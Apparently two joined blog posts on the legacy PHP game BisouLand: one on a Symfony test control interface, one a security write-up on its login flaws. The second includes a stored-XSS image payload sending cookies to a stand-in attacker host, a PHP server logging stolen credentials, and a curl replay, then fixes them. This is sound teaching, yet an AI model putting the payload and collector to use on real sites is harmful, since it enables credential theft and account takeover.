#[AsCommand] (introduced in Symfony 5.3) registers the command. #[Argument] and #[Option] (introduced in Symfony 7.3) declare the parameters directly on __invoke(), replacing the configure()/execute() boilerplate entirely. Symfony injects SymfonyStyle automatically.
The command is callable from a Makefile target:
make qalin arg='scenario:sign-in-new-player Petrus iLoveBlade'
make qalin arg='action:upgrade-instantly-for-free Petrus heart --levels=5'

🤔 Retrospective: the CLI currently calls action and scenario handlers directly, in-process. A better implementation would have it call the HTTP API instead, using an HTTP client. That would let the CLI target any environment, local or staging, by just changing the base URL. The direct handler approach was a POC shortcut.
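To make the retrospective concrete, here is a hedged sketch of what an HTTP-backed runner could look like, using Symfony's HttpClient. The class name, constructor wiring, and error handling are assumptions for illustration, not the actual DTK/Qalin implementation:

```php
use Symfony\Contracts\HttpClient\HttpClientInterface;

// Hypothetical: the CLI delegating to the HTTP API instead of in-process handlers.
final readonly class HttpActionRunner
{
    public function __construct(
        private HttpClientInterface $httpClient,
        // e.g. http://localhost:43010 locally, or a staging base URL
        private string $baseUrl,
    ) {
    }

    /**
     * @param array<string, mixed> $payload the action's input, serialized as JSON
     *
     * @return array<string, mixed> the action's output, decoded from JSON
     */
    public function run(string $actionKebab, array $payload): array
    {
        $response = $this->httpClient->request(
            'POST',
            "{$this->baseUrl}/api/v1/actions/{$actionKebab}",
            ['json' => $payload],
        );

        // toArray() decodes the JSON body and throws on non-2xx responses
        return $response->toArray();
    }
}
```

Swapping the in-process handler for a runner like this would let the same command target any environment by changing only the base URL.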
The API is the foundation on which other interfaces are built. The Web UI calls it, nothing stops you from building a Rust TUI or a mobile debug screen on top of it, and it is what makes Qalin usable on remote environments like staging servers.
Each action and scenario is a dedicated controller, registered with #[Route] and
accepting a deserialized input DTO via #[MapRequestPayload]:
final readonly class UpgradeInstantlyForFreeController
{
public function __construct(
private UpgradeInstantlyForFreeHandler $upgradeInstantlyForFreeHandler,
) {
}
#[Route('/api/v1/actions/upgrade-instantly-for-free', methods: ['POST'])]
public function __invoke(
#[MapRequestPayload]
UpgradeInstantlyForFree $upgradeInstantlyForFree,
): JsonResponse {
$upgradeInstantlyForFreed = $this->upgradeInstantlyForFreeHandler->run($upgradeInstantlyForFree);
return new JsonResponse(
json_encode($upgradeInstantlyForFreed->toArray(), \JSON_THROW_ON_ERROR),
Response::HTTP_CREATED,
json: true,
);
}
}
🎶 Modern Symfony:
#[MapRequestPayload] (introduced in Symfony 6.3) deserializes the JSON body into the input DTO and runs validation automatically. The controller itself has no boilerplate: it calls the handler and returns the result.
Calling it looks like this:
curl -X POST http://localhost:43010/api/v1/scenarios/sign-in-new-player \
-H 'Content-Type: application/json' \
-d '{"username": "Petrus", "password": "iLoveBlade"}'
curl -X POST http://localhost:43010/api/v1/actions/upgrade-instantly-for-free \
-H 'Content-Type: application/json' \
-d '{"username": "Petrus", "upgradable": "heart", "levels": 5}'
For designers and product people who prefer a browser, each action and scenario has a web page with a form.
The controller is a straightforward GET that renders a Twig template:
#[Route('/actions/upgrade-instantly-for-free', methods: ['GET'])]
public function __invoke(): Response
{
return new Response($this->twig->render('qalin/action/upgrade-instantly-for-free.html.twig', [
'upgradables' => Upgradable::cases(),
]));
}
The template itself is a plain HTML form with a data-api attribute pointing to the
API endpoint:
{% extends 'base.html.twig' %}
{% block title %}Upgrade Instantly For Free - Qalin{% endblock %}
{% block body %}
<h2>Action: Upgrade Instantly For Free</h2>
<form data-api="/api/v1/actions/upgrade-instantly-for-free" data-expect="201">
<label for="username">Username</label>
<input class="u-full-width" type="text" id="username" name="username" required>
<label for="upgradable">Upgradable</label>
<select class="u-full-width" id="upgradable" name="upgradable" required>
{% for upgradable in upgradables %}
<option value="{{ upgradable.value }}">{{ upgradable.name }}</option>
{% endfor %}
</select>
<label for="levels">Levels</label>
<input class="u-full-width" type="number" id="levels" name="levels" value="1">
<button class="button-primary" type="submit">Upgrade Instantly For Free</button>
</form>
<div class="result"></div>
{% endblock %}
A small JavaScript snippet in the base layout reads data-api, serializes the form as
JSON, POSTs it to the API, and renders the response into .result. No JavaScript
framework, no build step: just Twig and a <form>.
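The snippet itself isn't shown above, so here is a hedged sketch of what it could look like. The function names, the numeric-coercion rule (so `levels` arrives as an int rather than a string), and the ✅/❌ rendering are assumptions for illustration, not the actual code:

```javascript
// Serialize [name, value] form entries into the JSON body the API expects,
// coercing all-digit values to numbers so integer fields keep their type.
function serializeForm(entries) {
  const body = {};
  for (const [name, value] of entries) {
    body[name] = /^\d+$/.test(value) ? Number(value) : value;
  }
  return body;
}

// Wire every <form data-api="..."> on the page (browser-only part).
function wireForms(doc = document) {
  for (const form of doc.querySelectorAll('form[data-api]')) {
    form.addEventListener('submit', async (event) => {
      event.preventDefault();
      const entries = [...new FormData(form).entries()];
      const response = await fetch(form.dataset.api, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(serializeForm(entries)),
      });
      // data-expect carries the expected status code (e.g. "201")
      const ok = String(response.status) === (form.dataset.expect ?? '200');
      form.parentElement.querySelector('.result').textContent =
        (ok ? '✅ ' : '❌ ') + await response.text();
    });
  }
}
```

Everything lives in the base layout, so every action and scenario form gets the behavior for free.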

🤔 Retrospective: the web interface is the weakest part of the current implementation. A future iteration could replace the vanilla JavaScript with HTMX for a cleaner, server-driven approach.
Qalin exposes an ActionRunner and a ScenarioRunner that call handlers in-process,
with no HTTP overhead.
Automated tests (e.g. EndToEnd) use them in the Arrange phase to set up game state without raw SQL, without curl, and without coupling tests to database schema:
#[CoversNothing]
#[Large]
final class LogOutTest extends TestCase
{
public function test_it_allows_players_to_log_out(): void
{
// Arrange
$httpClient = TestKernelSingleton::get()->httpClient();
$scenarioRunner = TestKernelSingleton::get()->scenarioRunner();
/** @var SignedInNewPlayer $signedInNewPlayer */
$signedInNewPlayer = $scenarioRunner->run(new SignInNewPlayer(
UsernameFixture::makeString(),
PasswordPlainFixture::makeString(),
));
$sessionCookie = $signedInNewPlayer->toArray()['cookie'];
// Act
$httpClient->request('GET', '/logout.html', [
'headers' => ['Cookie' => $sessionCookie],
]);
// Assert
$response = $httpClient->request('GET', '/cerveau.html', [
'headers' => ['Cookie' => $sessionCookie],
]);
$this->assertStringContainsString("Tu n'es pas connecté.", $response->getContent());
$this->assertSame(200, $response->getStatusCode());
}
}
The Arrange is one call. It reads as plain English. The test is about logout, not about the sign-up and sign-in machinery needed to reach that state.
That machinery is encapsulated in the SignInNewPlayer scenario,
reused across every test that needs a logged-in player.
This is where the Test Control Interface pays off most: not only for manual testers, but also for the automated test suite that runs on every commit. Bumble arrived at the same pattern: their API tests call QAAPI methods in the arrange phase to configure test users before exercising the real protocol.
✏️ Edit: obstreperous_troll on Reddit observes that this resembles white-box testing, since Qalin reaches into internal state to set things up. That is a fair comparison: Qalin is white-box for the Arrange part of a test (it bypasses the public API to put the system in a specific state), but black-box for the Act and Assert parts (the test exercises real HTTP endpoints and checks real responses, just like any external consumer would).
✏️ Edit: Benjamin Rothan asks whether this is fixture generation for QA. Symfony developers may recognise a resemblance to Doctrine Fixtures or FakerBundle, but the intent is different: fixtures generate seed data at deployment time (a fixed dataset loaded once), whereas Qalin actions are called on demand, at any time, to reach a specific state for a specific test or demo. Think of it as a remote control for your application state, not a data seeder.
Adding a new action to Qalin means creating a handler, an input DTO, an output DTO, a CLI command, an API controller, a Web controller, a Twig template, and tests for all of them. That is 12 files.
Writing them by hand once is instructive. Doing it for every new action is not.
Qalin ships a custom MakerBundle command, make:qalin:action, that generates all 12
files from a single invocation:
make qalin-action arg='UpgradeInstantlyForFree \
--description="Instantly upgrade an upgradable for free" \
--output-name=UpgradeInstantlyForFreed \
--parameter="username:string:an existing username" \
--parameter="upgradable:string:an organ (e.g. heart), a bisou (e.g. smooch) or a technique (e.g. hold_breath)" \
--parameter="levels:int:number of levels to upgrade:1"'
The --parameter flag follows a name:type:description[:default] format.
Providing a default makes the parameter optional, omitting it makes it required.
The generator sorts required parameters before optional ones automatically, respecting PHP's constraint on default values.
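The parsing and sorting described above can be sketched as follows. This is a hypothetical reconstruction under the stated `name:type:description[:default]` format; the class and function names are illustrative, not the actual make:qalin:action internals:

```php
// Hypothetical value object for one --parameter="name:type:description[:default]" spec.
final readonly class ParameterSpec
{
    public function __construct(
        public string $name,
        public string $type,
        public string $description,
        public ?string $default = null,
    ) {
    }

    public static function fromString(string $spec): self
    {
        // Limit of 4: anything after the third colon is the default value.
        $parts = explode(':', $spec, 4);
        if (\count($parts) < 3) {
            throw new \InvalidArgumentException(
                "Expected name:type:description[:default], got \"{$spec}\"",
            );
        }

        return new self($parts[0], $parts[1], $parts[2], $parts[3] ?? null);
    }

    public function isRequired(): bool
    {
        return null === $this->default;
    }
}

/**
 * Sort required parameters first, respecting PHP's constraint that
 * parameters with default values must come last.
 *
 * @param list<ParameterSpec> $specs
 *
 * @return list<ParameterSpec>
 */
function sortParameters(array $specs): array
{
    usort($specs, fn (ParameterSpec $a, ParameterSpec $b) => $b->isRequired() <=> $a->isRequired());

    return $specs;
}
```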
The generated files are fully wired:
* the CLI command uses #[AsCommand], #[Argument] and #[Option]
* the API controller uses #[Route] and #[MapRequestPayload]
* the input DTO is the same class used by all three interfaces and the test suite
* Spec tests for the DTO and handler are generated with Prophecy stubs pre-populated
* Integration tests for each interface are generated with the correct
#[CoversNothing] / #[Medium] attributes and data providers stubbed out.
After generation, the workflow is:
* open UpgradeInstantlyForFreeHandler.php
* fill in the TODO comments
* run make phpstan-analyze and make phpunit

The command also has an interactive mode for when you want to be guided through
each field, and a make:qalin:scenario counterpart that adds a --action option for
composing existing action handlers:
make qalin-scenario arg='SignInNewPlayer \
--description="Sign up and immediately sign in a brand-new player" \
--output-name=SignedInNewPlayer \
--parameter="username:string:4-15 alphanumeric characters" \
--parameter="password:string:8-72 characters" \
--action=SignUpNewPlayer \
--action=SignInPlayer'
The generated scenario handler comes pre-wired with SignUpNewPlayerHandler and
SignInPlayerHandler as constructor dependencies, their namespaces already imported.
Building a MakerBundle command means extending AbstractMaker and implementing three
methods: configureCommand() for option declarations, interact() for the interactive
prompts, and generate() for file generation via the Generator service. The
generate() method is a flat list of generateClass() calls, one per file:
public function generate(InputInterface $input, ConsoleStyle $io, Generator $generator): void
{
// ... resolve variables from input ...
// 1. Action input DTO
$generator->generateClass(
"Bl\\Qa\\Application\\Action\\{$actionName}\\{$actionName}",
"{$templateDir}/Qalin/Action/HandlerInput.tpl.php",
$variables,
);
// 2. Action handler
$generator->generateClass(
"Bl\\Qa\\Application\\Action\\{$actionName}\\{$actionName}Handler",
"{$templateDir}/Qalin/Action/Handler.tpl.php",
$variables,
);
// ... 10 more files: output DTO, CLI command, Web controller, API controller,
// Twig template, spec tests, integration tests ...
$generator->writeChanges();
}
Templates are plain PHP files that echo the target source. The API controller template, for instance, reproduces exactly the class pattern shown earlier in this article:
<?php echo "<?php\n"; ?>
declare(strict_types=1);
namespace <?php echo $namespace; ?>;
use Bl\Qa\Application\Action\<?php echo $action_name; ?>\<?php echo $action_name; ?>;
use Bl\Qa\Application\Action\<?php echo $action_name; ?>\<?php echo $action_name; ?>Handler;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpKernel\Attribute\MapRequestPayload;
use Symfony\Component\Routing\Attribute\Route;
final readonly class <?php echo $class_name; ?>
{
public function __construct(
private <?php echo $action_name; ?>Handler $<?php echo $action_camel; ?>Handler,
) {
}
#[Route('/api/v1/actions/<?php echo $action_kebab; ?>', methods: ['POST'])]
public function __invoke(
#[MapRequestPayload]
<?php echo $action_name; ?> $<?php echo $action_camel; ?>,
): JsonResponse {
$<?php echo lcfirst($action_output_name); ?> = $this-><?php echo $action_camel; ?>Handler->run($<?php echo $action_camel; ?>);
return new JsonResponse(
json_encode($<?php echo lcfirst($action_output_name); ?>->toArray(), \JSON_THROW_ON_ERROR),
Response::HTTP_CREATED,
json: true,
);
}
}
The result is a generator that knows your project's conventions as well as you do.
🎶 Modern Symfony: MakerBundle is best known for generating controllers, entities, and form types, but its real power is that it is extensible. Any repetitive file structure in your project, a command handler pair, an event with its listener, a domain object with its repository and tests, is a candidate for a custom maker. The API is straightforward, the templates are plain PHP, and the payoff compounds every time a new developer joins the project and generates their first file in seconds rather than copy-pasting for an hour.
BisouLand is a 2005 LAMP application with no test harness, no clean architecture.
Rather than fighting that, I built a separate Symfony 8 application alongside it: a Test Control Interface that anyone on the team can use to reach any game state in seconds.
This is not new. Bumble has been running QAAPI since 2013 across a much larger codebase, used by every role from developer to QA to designer. The idea translates cleanly to any stack.
What Symfony 8 brings is that the boilerplate cost is near zero:
* #[AsCommand], #[Argument] and #[Option] replace configure() and execute()
* #[Route] and #[MapRequestPayload] replace manual deserialization and validation
* readonly classes keep handlers and DTOs concise

Adding a new action to Qalin takes minutes, not hours. The generated code is consistent, tested, and immediately usable from the terminal, the web UI, or a PHPUnit test.
Want to learn more?
Qalin went from zero to usable in two weeks. One thing worth exploring in a future iteration is self-documenting input DTOs.
In QAAPI, a method is self-describing: getDescription() documents the method itself,
and each parameter is declared via a builder that carries its own description:
'seconds' => \QAAPI\Params\PositiveInteger::create()
->setDescription('Offset in seconds'),
In Qalin, the input DTO is a plain readonly class. The parameter descriptions live
only in the MakerBundle invocation, then get scattered across #[Argument] and
#[Option] attributes in the CLI command. They are not available to the web template,
where a tooltip next to each field would meaningfully improve usability.
A natural starting point would be a getDescription() method on the input DTO, and
custom PHP attributes to carry per-parameter metadata:
#[ActionDescription('Instantly upgrade an upgradable for free')]
final readonly class UpgradeInstantlyForFree
{
public function __construct(
#[ParameterDescription('an existing username')]
public string $username,
#[ParameterDescription('heart, mouth, legs, etc')]
public string $upgradable,
#[ParameterDescription('how many levels to upgrade at once')]
public int $levels = 1,
) {
}
}
That metadata could then be read via reflection and surfaced in the web template as
tooltips, and injected into --help output on the CLI.
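A minimal sketch of that reflection step, assuming the ParameterDescription attribute above is declared with #[\Attribute] and exposes a public string $description property:

```php
// Hypothetical: collect per-parameter descriptions from the input DTO's constructor.
$descriptions = [];
$constructor = (new \ReflectionClass(UpgradeInstantlyForFree::class))->getConstructor();
foreach ($constructor->getParameters() as $parameter) {
    foreach ($parameter->getAttributes(ParameterDescription::class) as $attribute) {
        $descriptions[$parameter->getName()] = $attribute->newInstance()->description;
    }
}
// e.g. $descriptions['username'] would hold 'an existing username'
```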
The trade-off is that building CLI commands dynamically from DTO metadata means giving
up #[Argument] and #[Option] on __invoke(). The command would go back to
configure() and execute(), constructed at runtime from reflected attributes rather
than declared statically. That is perfectly fine: #[Argument] and #[Option] shine
for the common case, lowering the bar for anyone writing their first command. When
requirements grow more dynamic, the traditional API is still there, just as capable.
The new attributes and the old approach are not in competition; they serve different
needs, and Symfony giving us both is the point.
🤘 Awakened by the sins of forgotten sanitization, the Cookie Burglar breaches the walls of client-side trust, stealing credentials from the altar of the Script Injector with its serpentine payloads! 🔥
In this series, we're dealing with BisouLand, an eXtreme Legacy application (2005 LAMP spaghetti code base). So far, we have:
This means we can run it locally (http://localhost:43000/), and have some level of automated tests.
When migrating from the deprecated PHP extension mysql to PDO,
we were expecting to find some SQL injection vulnerabilities,
as the queries were written by concatenating user input.
But to our surprise, none of these were exploitable,
as the user input was sanitised and validated
(e.g. only 15 alphanumeric characters for the username, addslashes, htmlentities, ...).
Still, following the Secure PHP Database recommendations, we:
In today's article, we'll explore an actually exploitable vulnerability which allows an attacker to steal a victim's credentials and impersonate them.
First we're going to look at different sections of the code.
Let's start with how logging in is handled:
// phpincludes/app.php
// ---------- Visitor Logs in
if ('POST' === $_SERVER['REQUEST_METHOD'] && isset($_POST['connexion'])) {
// Ensuite on vérifie que les variables existent et contiennent quelque chose :)
if (isset($_POST['pseudo'], $_POST['mdp']) && !empty($_POST['pseudo']) && !empty($_POST['mdp'])) {
// Mesure de sécurité, notamment pour éviter les injections sql.
// Le htmlentities évitera de le passer par la suite.
$pseudo = htmlentities((string) $_POST['pseudo']);
$mdp = htmlentities((string) $_POST['mdp']);
// Hashage du mot de passe.
$mdp = md5($mdp);
// ---------- Persist the authentication (cookie creation)
// La requête qui compte le nombre de pseudos
$stmt = $pdo->prepare('SELECT COUNT(*) AS nb_pseudo FROM membres WHERE pseudo = :pseudo');
$stmt->execute(['pseudo' => $pseudo]);
// La on vérifie si le nombre est différent que zéro
if (0 != $stmt->fetchColumn()) {
// Sélection des informations.
$stmt = $pdo->prepare('SELECT id, confirmation, mdp, nuage FROM membres WHERE pseudo = :pseudo');
$stmt->execute(['pseudo' => $pseudo]);
$donnees_info = $stmt->fetch();
if (isset($_POST['auto'])) {
$timestamp_expire = time() + 30 * 24 * 3600;
setcookie('pseudo', $pseudo, ['expires' => $timestamp_expire]);
setcookie('mdp', $mdp, ['expires' => $timestamp_expire]);
}
}
}
}
And here's how the cookie based authentication is done:
// phpincludes/app.php
// ---------- Authenticate player (using cookie)
// Si on est pas connecté.
if (false == $_SESSION['logged']) {
$id = 0;
// On récupère les cookies enregistrés chez l'utilisateurs, s'ils sont la.
if (isset($_COOKIE['pseudo']) && isset($_COOKIE['mdp'])) {
$pseudo = htmlentities(addslashes((string) $_COOKIE['pseudo']));
$mdp = htmlentities(addslashes($_COOKIE['mdp']));
// La requête qui compte le nombre de pseudos
$stmt = $pdo->prepare('SELECT COUNT(*) AS nb_pseudo FROM membres WHERE pseudo = :pseudo');
$stmt->execute(['pseudo' => $pseudo]);
if (0 != $stmt->fetchColumn()) {
// Sélection des informations.
$stmt = $pdo->prepare('SELECT id, confirmation, mdp, nuage FROM membres WHERE pseudo = :pseudo');
$stmt->execute(['pseudo' => $pseudo]);
$donnees_info = $stmt->fetch();
// Si le mot de passe est le même (le mot de passe est déjà crypté).
// Si le compte est confirmé.
if ($donnees_info['mdp'] == $mdp && true === $donnees_info['confirmation']) {
// On modifie la variable qui nous indique que le membre est connecté.
$_SESSION['logged'] = true;
// On créé les variables contenant des informations sur le membre.
$_SESSION['id'] = $donnees_info['id'];
$_SESSION['pseudo'] = $pseudo;
$_SESSION['nuage'] = $donnees_info['nuage'];
$page = 'cerveau';
}
}
}
}
We can already spot some issues here.
First on the list is the following:
$mdp = md5($mdp);
MD5 is a weak password hashing strategy: it is designed to be fast (which makes brute force cheap), it is used here without a salt, and precomputed lookup tables exist for common passwords.
This means stolen MD5 hashes can be reversed to plain text passwords, allowing attackers to access accounts and potentially other sites where victims reused passwords.
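A small demonstration of how cheap this reversal is with a dictionary attack. The candidate list here is illustrative; real attackers use wordlists with millions of entries:

```php
// An unsalted MD5 hash stolen from a cookie or a leaked database dump.
$stolenHash = '25d55ad283aa400af464c76d713c07ad';

// Hash each dictionary candidate and compare: no salt means one lookup table
// or one pass over a wordlist cracks every account sharing the password.
foreach (['password', 'qwerty', '12345678', 'iLoveBlade'] as $candidate) {
    if (md5($candidate) === $stolenHash) {
        echo "Cracked: {$candidate}\n"; // prints "Cracked: 12345678"
    }
}
```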
Second on the list are the actual credentials (username and password) being stored in the cookies:
setcookie('pseudo', $pseudo, ['expires' => $timestamp_expire]);
setcookie('mdp', $mdp, ['expires' => $timestamp_expire]);
This is fundamentally flawed:
Third on the list is how we set the cookies:
setcookie('pseudo', $pseudo, ['expires' => $timestamp_expire]);
setcookie('mdp', $mdp, ['expires' => $timestamp_expire]);
Here we're leaving the default settings for the following options:
* httponly: defaults to false, which means the cookie can be read by JavaScript
* secure: defaults to false, which means the cookie can be sent over plain HTTP (as opposed to only over HTTPS)
* samesite: not set, which means the cookie can be sent in cross-site requests

Let's resume our review of the code, as there's more, especially with the handling of private messages, which are stored in the database as follows:
// phpincludes/fctIndex.php
function AdminMP($cible, $objet, $message, bool $lu = false): void
{
$pdo = bd_connect();
$castToPgBoolean = cast_to_pg_boolean();
$castToPgTimestamptz = cast_to_pg_timestamptz();
$message = nl2br((string) $message);
$stmt = $pdo->prepare('SELECT COUNT(*) AS nbmsg FROM messages WHERE destin = :destin');
$stmt->execute(['destin' => $cible]);
$nbmsg = $stmt->fetchColumn();
if ($nbmsg >= 20) {
$Asuppr = $nbmsg - 19;
$stmt = $pdo->prepare(
'DELETE FROM messages'
.' WHERE ('
.' destin = :destin'
." AND timestamp <= CURRENT_TIMESTAMP - INTERVAL '48 hours'"
.' )'
.' ORDER BY id LIMIT :limit',
);
$stmt->execute(['destin' => $cible, 'limit' => $Asuppr]);
}
$timestamp = time();
$stmt = $pdo->prepare(
'INSERT INTO messages'
.' (id, posteur, destin, message, timestamp, statut, titre)'
.' VALUES(:id, :posteur, :destin, :message, :timestamp, :statut, :titre)',
);
$stmt->execute([
'id' => Uuid::v7(),
'posteur' => '00000000-0000-0000-0000-000000000001',
'destin' => $cible,
'message' => $message,
'timestamp' => $castToPgTimestamptz->fromUnixTimestamp($timestamp),
'statut' => $castToPgBoolean->from($lu),
'titre' => $objet],
);
}
And finally when they are displayed, the values from the database are printed directly:
// phpincludes/lire.php
if (true === $_SESSION['logged']) {
$pdo = bd_connect();
$castToUnixTimestamp = cast_to_unix_timestamp();
if (isset($_GET['idmsg']) && !empty($_GET['idmsg'])) {
$idmsg = htmlentities((string) $_GET['idmsg']);
$stmt = $pdo->prepare('SELECT posteur, destin, message, timestamp, statut, titre FROM messages WHERE id = :id');
$stmt->execute(['id' => $idmsg]);
$donnees = $stmt->fetch();
if ($donnees['destin'] == $_SESSION['id']) {
if (false === $donnees['statut']) {
$stmt2 = $pdo->prepare('UPDATE messages SET statut = TRUE WHERE id = :id');
$stmt2->execute(['id' => $idmsg]);
}
$stmt = $pdo->prepare('SELECT pseudo FROM membres WHERE id = :id');
$stmt->execute(['id' => $donnees['posteur']]);
$donnees2 = $stmt->fetch();
$from = $donnees2['pseudo'];
$objet = $donnees['titre'];
$message = $donnees['message'];
$dateEnvoie = $castToUnixTimestamp->fromPgTimestamptz($donnees['timestamp']);
?>
<a href="boite.html" title="Messages">Retour à la liste des messages</a>
<br />
<p>Auteur : <?php echo stripslashes((string) $from); ?></p>
<p>Envoyé le <?php echo date('d/m/Y à H\hi', $dateEnvoie); ?></p>
<p>Objet : <?php echo stripslashes((string) $objet); ?></p>
Message :<br />
<div class="message"><?php echo bbLow($message); ?></div>
There's one last issue with the code above, and it's certainly not the least:
we can see in AdminMP() that private messages are stored
in the database without any validation or sanitization.
This allows players to write malicious code (HTML, JavaScript) in their message, which will then be permanently stored.
When they are displayed, these messages are again printed as is straight from the database, without sanitization, which means that any malicious code (HTML, JavaScript) will be displayed and executed.
This opens the door to Cross Site Scripting (XSS) attacks.
Security Vulnerabilities have been found, but can they actually be used?
Given the lack of httponly, secure and samesite options,
it should be possible to obtain the credentials
(and that's without physical access to the computer!).
Let's demonstrate how the attack can be executed in 4 steps:
Here's an example of a message an attacker can craft:
ALL YOUR BASE ARE BELONG TO US
<img src=x onerror="new Image().src='http://localhost:8080/steal?c='+document.cookie">
HAHAHA
The onerror attribute will execute the JavaScript when the image fails to load,
and the new Image().src makes an HTTP request with the victim's cookies.

This will happen without the knowledge of the victim!
Here's a demo server we can use to test this:
<?php
/**
* File (for demonstration purpose only): xl-9-attacker-server.php
*
* Receives stolen cookies from payloads injected into the BisouLand messaging system.
* Demonstrates how credentials are exfiltrated via JavaScript in real attack scenarios.
*
* Usage: php -S localhost:8080 xl-9-attacker-server.php
*/
function server_log(string $message): void {
$receivedAt = new \DateTimeImmutable()->format('D M j H:i:s Y');
file_put_contents('php://stderr', "[{$receivedAt}] {$message}\n");
}
// Parse cookies
$cookies = [];
parse_str(str_replace('; ', '&', $_GET['c'] ?? ''), $cookies);
// Display to console
$username = $cookies['pseudo'] ?? '';
$password = $cookies['mdp'] ?? '';
server_log("c is for cookies, that's good enough for me");
server_log(" Username: {$username}");
server_log(" Password: {$password}");
// Send response
http_response_code(204);
The attacker will receive on their server:
[Tue Dec 2 18:11:34 2025] c is for cookies, that's good enough for me
[Tue Dec 2 18:11:34 2025] Username: ln42
[Tue Dec 2 18:11:34 2025] Password: 25d55ad283aa400af464c76d713c07ad
And can use them to access the victim's account:
curl --cookie 'pseudo=ln42; mdp=25d55ad283aa400af464c76d713c07ad' http://localhost:43000/cerveau.html
Now that we've identified the vulnerabilities, let's fix them systematically.
Let's follow the secure PHP Password Hashing recommendations,
which suggest using the password_*() functions available since PHP 5.5.
First in phpincludes/inscription.php,
we'll hash the password with a proper algorithm
(PASSWORD_DEFAULT is bcrypt as of PHP 5.5, and may change to a stronger algorithm such as Argon2 in a future version):
- // Hashage du mot de passe avec md5().
- $hmdp = md5($mdp);
+ // Hashage du mot de passe avec Bcrypt ou Argon2.
+ $hmdp = password_hash($mdp, \PASSWORD_DEFAULT);
$id = Uuid::v7();
$stmt = $pdo->prepare(
'INSERT INTO membres (id, pseudo, mdp, confirmation, timestamp, lastconnect, amour)'
.' VALUES (:id, :pseudo, :mdp, :confirmation, CURRENT_TIMESTAMP, CURRENT_TIMESTAMP, :amour)',
);
$stmt->execute([
'id' => $id,
'pseudo' => $pseudo,
'mdp' => $hmdp,
'confirmation' => $castToPgBoolean->from(true),
'amour' => 300,
]);
Then in phpincludes/app.php when the visitor attempts to login,
we use password_verify() to compare the hash stored in the database,
and the plain text password provided:
$mdp = htmlentities((string) $_POST['mdp']);
// Hashage du mot de passe.
- $mdp = md5($mdp);
// Si le mot de passe est le même.
- if ($donnees_info['mdp'] == $mdp) {
+ if (password_verify($mdp, $donnees_info['mdp'])) {
Next, we're going to follow the secure authentication in PHP with long-term persistence recommendations, which advocate creating authentication tokens.
We're going to change the Persist the authentication (cookie creation) section,
replacing it with the creation of an Auth Token which we'll save in the database,
and then store in the cookie:
// ---------- Persist the authentication (cookie creation)
// Instead of counting matches, then selecting pseudonym
// we directly select the account ID
$stmt = $pdo->prepare(<<<'SQL'
SELECT id AS account_id
FROM membres
WHERE pseudo = :pseudonym
SQL);
$stmt->execute(['pseudonym' => $pseudo]);
/** @var array{account_id: string}|false $account account_id is a UUID */
$account = $stmt->fetch();
if (false !== $account) {
// Using Symfony\Component\Uid\Uuid
// This is the "selector"
$authTokenId = Uuid::v7();
// 32 random hexadecimal characters
// This is stored directly in the cookie
$plainToken = bin2hex(random_bytes(16));
// The hash is stored in the database
// If the table's content is leaked, it won't reveal what the cookies hold
$tokenHash = hash('sha256', $plainToken);
$expiresAt = new \DateTimeImmutable('+30 days');
$stmt = $pdo->prepare(<<<'SQL'
INSERT INTO auth_tokens
(auth_token_id, token_hash, account_id, expires_at)
VALUES (:auth_token_id, :token_hash, :account_id, :expires_at)
SQL);
$stmt->execute([
'auth_token_id' => $authTokenId,
'token_hash' => $tokenHash,
'account_id' => $account['account_id'],
'expires_at' => $expiresAt->format('Y-m-d\\TH:i:s.uP'),
]);
setcookie(
'bl_auth_token',
"{$authTokenId}:{$plainToken}",
[
'expires' => $expiresAt->getTimestamp(),
// Using safer cookie settings
'httponly' => true,
'secure' => true,
'samesite' => 'Strict',
'path' => '/',
],
);
}
As suggested in the Paragonie article,
we now store <authTokenId>:<token> in the cookie;
this way it no longer contains the username and password,
so obtaining it doesn't compromise the account entirely.
Here's a table to store these:
--------------------------------------------------------------------------------
-- Authentication Tokens
-- Allows secure Authentication Persistence
--------------------------------------------------------------------------------
CREATE TABLE IF NOT EXISTS auth_tokens (
auth_token_id UUID PRIMARY KEY,
token_hash VARCHAR(64) NOT NULL,
account_id UUID NOT NULL REFERENCES membres(id) ON DELETE CASCADE,
created_at TIMESTAMPTZ NOT NULL DEFAULT CURRENT_TIMESTAMP,
expires_at TIMESTAMPTZ NOT NULL DEFAULT CURRENT_TIMESTAMP + '30 days'
);
We also need to replace the entire Authenticate player (using cookie) section.
To check whether the cookie is valid, we hash the token it carries,
then compare the result to the hash in the database using the constant-time hash_equals():
if (false === $_SESSION['logged'] && isset($_COOKIE['bl_auth_token'])) {
[$authTokenId, $plainToken] = explode(':', $_COOKIE['bl_auth_token'], 2);
$stmt = $pdo->prepare(<<<'SQL'
SELECT token_hash, account_id
FROM auth_tokens
WHERE auth_token_id = :auth_token_id
AND expires_at > CURRENT_TIMESTAMP
SQL);
$stmt->execute([
'auth_token_id' => $authTokenId,
]);
/** @var array{token_hash: string, account_id: string}|false $authToken */
$authToken = $stmt->fetch();
if (false !== $authToken) {
$tokenHash = hash('sha256', $plainToken);
if (hash_equals($authToken['token_hash'], $tokenHash)) {
// Token is valid, get account details
$stmt = $pdo->prepare(<<<'SQL'
SELECT id, pseudo, nuage
FROM membres
WHERE id = :account_id
SQL);
$stmt->execute([
'account_id' => $authToken['account_id'],
]);
/** @var array{id: string, pseudo: string, nuage: int}|false $account */
$account = $stmt->fetch();
if (false !== $account) {
// On modifie la variable qui nous indique que le membre est connecté.
$_SESSION['logged'] = true;
// On créé les variables contenant des informations sur le membre.
$_SESSION['id'] = $account['id'];
$_SESSION['pseudo'] = $account['pseudo'];
$_SESSION['nuage'] = $account['nuage'];
$page = 'cerveau';
}
}
}
}
Finally, we can fix the XSS vulnerability by escaping the user-generated content, such as the title and message content, before displaying it:
<!-- phpincludes/lire.php -->
<a href="boite.html" title="Messages">Retour à la liste des messages</a>
<br />
<p>Auteur : <?php echo stripslashes((string) $from); ?></p>
<p>Envoyé le <?php echo date('d/m/Y à H\hi', $dateEnvoie); ?></p>
- <p>Objet : <?php echo stripslashes((string) $objet); ?></p>
+ <p>Objet : <?php echo htmlspecialchars(stripslashes((string) $objet), ENT_QUOTES, 'UTF-8'); ?></p>
Message :<br />
- <div class="message"><?php echo bbLow($message); ?></div>
+ <div class="message"><?php echo bbLow(htmlspecialchars($message, ENT_QUOTES, 'UTF-8')); ?></div>
In this article, we've explored a critical vulnerability chain in BisouLand that allowed attackers to steal user credentials through XSS attacks.
